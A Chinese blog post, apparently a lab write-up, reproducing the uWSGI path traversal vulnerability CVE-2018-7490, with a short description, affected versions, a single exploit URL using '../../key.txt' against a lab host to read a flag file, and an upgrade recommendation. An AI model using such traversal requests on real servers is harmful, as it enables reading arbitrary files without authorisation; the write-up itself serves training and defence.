靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)

admin 2020年9月5日10:40:13评论472 views字数 457阅读1分31秒阅读模式

靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)

0x01漏洞简介


uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。


uWSGI2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件。


0x02 漏洞编号


CVE-2018-7490


0x03 影响版本


Debian Debian_linux:8.0  

Debian Debian_linux:9.0  


0x04 靶场演练


靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)


http://219.153.49.228:49233/../../key.txt


靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)


拿到key之后提交,完成靶场考核


0x05 修复建议


升级版本:

https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html

靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)


推荐文章++++

靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)

*使用Vulhub快速搭建攻防环境靶场+tcpdump实行流量监测

*漏洞靶场部署与镜像打包下载

*CVE-2019-17671:wrodpress 未授权访问漏洞-复现


靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)

靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月5日10:40:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场:uWSGI 路径遍历漏洞复现(CVE-2018-7490)http://cn-sec.com/archives/119477.html

发表评论

匿名网友 填写信息